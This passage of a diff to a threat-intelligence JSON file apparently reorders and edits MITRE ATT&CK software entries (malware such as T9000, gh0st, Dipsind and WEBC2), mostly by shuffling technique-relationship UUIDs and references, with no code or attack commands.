"dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29", + "value": "OSX_OCEANLOTUS.D - S0352" + }, { "description": "[T9000](https://attack.mitre.org/software/S0098) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. (Citation: FireEye admin@338 March 2014) (Citation: Palo Alto T9000 Feb 2016)", "meta": { @@ -2182,13 +3271,6 @@ ], "type": "uses" }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ @@ -2197,56 +3279,7 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2260,7 +3293,63 @@ "type": "uses" }, { - "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2319,8 +3408,7 @@ "Windows" ], "refs": [ - "https://attack.mitre.org/software/S0060", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + "https://attack.mitre.org/software/S0060" ], "synonyms": [ "Sys10" @@ -2349,7 +3437,7 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2363,14 +3451,14 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2423,83 +3511,6 @@ "uuid": "251fbae2-78f6-4de7-84f6-194c727a64ad", "value": "Lurid - S0010" }, - { - "description": "[gh0st](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by many groups. (Citation: FireEye Hacking Team)", - "meta": { - "external_id": "S0032", - "mitre_platforms": [ - "Windows", - "macOS" - ], - "refs": [ - "https://attack.mitre.org/software/S0032", - "https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html" - ], - "synonyms": [ - "gh0st" - ] - }, - "related": [ - { - "dest-uuid": "1b1ae63f-bcee-4aba-8994-6c60cee5e16f", - "tags": [ - "estimative-language:likelihood-probability=\"likely\"" - ], - "type": "similar" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - } - ], - "uuid": "88c621a7-aef9-4ae0-94e3-1fc87123eb24", - "value": "gh0st - S0032" - }, { "description": "[Dipsind](https://attack.mitre.org/software/S0200) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://attack.mitre.org/groups/G0068). (Citation: Microsoft PLATINUM April 2016)", "meta": { @@ -2523,13 +3534,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ @@ -2544,6 +3548,20 @@ ], "type": "uses" }, + { + "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ @@ -2558,13 +3576,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -2636,41 +3647,6 @@ ], "type": "uses" }, - { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -2678,13 +3654,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ @@ -2706,20 +3675,6 @@ ], "type": "uses" }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ @@ -2728,14 +3683,7 @@ "type": "uses" }, { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2749,7 +3697,49 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2763,7 +3753,28 @@ "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2851,13 +3862,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -2866,7 +3870,14 @@ "type": "uses" }, { - "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2879,13 +3890,6 @@ ], "type": "uses" }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", "tags": [ @@ -2894,7 +3898,14 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2930,13 +3941,6 @@ ], "type": "uses" }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -2944,41 +3948,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ @@ -2987,7 +3956,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3000,6 +3969,13 @@ ], "type": "uses" }, + { + "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ @@ -3007,6 +3983,13 @@ ], "type": "uses" }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ @@ -3015,7 +3998,21 @@ "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3028,12 +4025,26 @@ ], "type": "uses" }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "2eb9b131-d333-4a48-9eb4-d8dec46c19ee", @@ -3081,14 +4092,21 @@ "type": "uses" }, { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3108,20 +4126,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -3129,13 +4133,6 @@ ], "type": "uses" }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ @@ -3143,12 +4140,26 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "e066bf86-9cfb-407a-9d25-26fd5d91e360", @@ -3193,14 +4204,14 @@ "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3282,7 +4293,7 @@ "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3296,7 +4307,7 @@ "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3309,13 +4320,6 @@ ], "type": "uses" }, - { - "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ @@ -3323,26 +4327,33 @@ ], "type": "uses" }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "6b616fc1-1505-48e3-8b2c-0d19337bff38", @@ -3390,7 +4401,7 @@ "value": "Taidoor - S0011" }, { - "description": "[WEBC2](https://attack.mitre.org/software/S0109) is a backdoor used by [APT1](https://attack.mitre.org/groups/G0006) to retrieve a Web page from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)", + "description": "[WEBC2](https://attack.mitre.org/software/S0109) is a backdoor used by [APT1](https://attack.mitre.org/groups/G0006) to retrieve a Web page from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)", "meta": { "external_id": "S0109", "mitre_platforms": [ @@ -3398,7 +4409,8 @@ ], "refs": [ "https://attack.mitre.org/software/S0109", - "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip" + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" ], "synonyms": [ "WEBC2" @@ -3418,6 +4430,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "1d808f62-cf63-4063-9727-ff6132514c22", @@ -3466,7 +4492,35 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3493,20 +4547,6 @@ ], "type": "uses" }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ @@ -3515,21 +4555,7 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3543,7 +4569,21 @@ "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3556,20 +4596,6 @@ ], "type": "uses" }, - { - "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ @@ -3585,7 +4611,7 @@ "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3626,7 +4652,42 @@ "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3639,6 +4700,20 @@ ], "type": "uses" }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "65917ae0-b854-4139-83fe-bf2441cf0196", "tags": [ @@ -3654,21 +4729,7 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3682,21 +4743,7 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": 